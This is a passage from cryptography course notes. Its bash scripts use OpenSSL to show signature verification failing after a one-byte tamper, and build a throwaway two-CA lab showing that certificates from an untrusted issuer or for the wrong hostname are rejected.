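    sign_file "$d/private.pem" "$d/big.txt" "$d/big.sig"
    verify_file "$d/public.pem" "$d/big.txt" "$d/big.sig" || { rm -rf "$d"; return 1; }
    echo "signature OK on original"
    printf 'B' | dd of="$d/big.txt" bs=1 seek=0 count=1 conv=notrunc 2>/dev/null   # one-byte tamper
    if verify_file "$d/public.pem" "$d/big.txt" "$d/big.sig"; then
        echo "unexpected: tampered file verified"; rm -rf "$d"; return 1
    fi
    echo "signature fails on tampered file"
    rm -rf "$d"
}

demo
```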
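For the PKI section, the following added example (mine, not the page's) builds a throwaway two-CA lab so the four "How it Works" steps can be run rather than read: a root CA is created, a website key and CSR are generated, the CA signs the CSR, and `openssl verify` plays the browser's role against three cases. The CA names `labroot` and `rogueca`, the hostnames `www.example.test` and `login.example.test`, and the one-day validity are all made up for the example; it assumes OpenSSL 1.1.1 or later with its default config file present (which `openssl req` needs).

```shell
#!/usr/bin/env bash
# Added example (not from the course page): a minimal PKI showing what "the CA
# issues a certificate" and "the browser verifies it" mean in practice.
set -eu

new_ec_key() {        # new_ec_key OUT: P-256 key, the type most web PKI uses today
    openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:P-256 -out "$1" 2>/dev/null
}

# make_root_ca DIR NAME -> DIR/NAME.key, DIR/NAME.pem (self-signed root with
# CA:TRUE and keyCertSign, the two extensions a verifier requires of an issuer)
make_root_ca() {
    new_ec_key "$1/$2.key"
    openssl req -new -key "$1/$2.key" -subj "/CN=$2" -out "$1/$2.csr" 2>/dev/null
    printf 'basicConstraints=critical,CA:TRUE\nkeyUsage=critical,keyCertSign,cRLSign\n' > "$1/$2.ext"
    openssl x509 -req -in "$1/$2.csr" -signkey "$1/$2.key" -days 1 -sha256 \
        -extfile "$1/$2.ext" -out "$1/$2.pem" 2>/dev/null
}

# issue_leaf DIR CA HOST NAME: the "website" makes a key and a CSR (the CSR
# carries only the public key); the CA signs it with a SAN for HOST and CA:FALSE.
issue_leaf() {
    new_ec_key "$1/$4.key"
    openssl req -new -key "$1/$4.key" -subj "/CN=$3" -out "$1/$4.csr" 2>/dev/null
    printf 'subjectAltName=DNS:%s\nbasicConstraints=critical,CA:FALSE\n' "$3" > "$1/$4.ext"
    openssl x509 -req -in "$1/$4.csr" -CA "$1/$2.pem" -CAkey "$1/$2.key" -CAcreateserial \
        -days 1 -sha256 -extfile "$1/$4.ext" -out "$1/$4.pem" 2>/dev/null
}

# verify_leaf TRUSTED_CA LEAF [HOST]: the client's check (chain to a trusted
# root, validity period, and the name when HOST is given); exit status is the verdict.
verify_leaf() {
    if [ $# -ge 3 ]; then
        openssl verify -CAfile "$1" -verify_hostname "$3" "$2" >/dev/null 2>&1
    else
        openssl verify -CAfile "$1" "$2" >/dev/null 2>&1
    fi
}

demo() {
    d=$(mktemp -d)
    make_root_ca "$d" labroot                        # the CA the client trusts
    make_root_ca "$d" rogueca                        # a CA the client does not trust
    issue_leaf "$d" labroot www.example.test good
    issue_leaf "$d" rogueca www.example.test fake    # same name, signed by the wrong issuer
    good=0; fake=0; host=0
    verify_leaf "$d/labroot.pem" "$d/good.pem" www.example.test && good=1
    verify_leaf "$d/labroot.pem" "$d/fake.pem" www.example.test || fake=1
    verify_leaf "$d/labroot.pem" "$d/good.pem" login.example.test || host=1
    rm -rf "$d"
    echo "trusted issuer ok=$good; untrusted issuer rejected=$fake; wrong hostname rejected=$host"
    [ "$good$fake$host" = 111 ]
}

demo
```

The `fake` certificate is what a phishing site would present if it could run its own CA: it is a perfectly valid certificate for the right name, and it is rejected purely because its issuer is not in the client's trust store. That trust store, not the certificate format, is what carries the security of the whole system.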

---

## **Summary**
✔ Understand symmetric vs. asymmetric encryption.
✔ Use OpenSSL for encryption and decryption.
✔ Generate and verify hashes for integrity.
✔ Work with digital signatures and PKI.
--------------------------------------------------------------------------------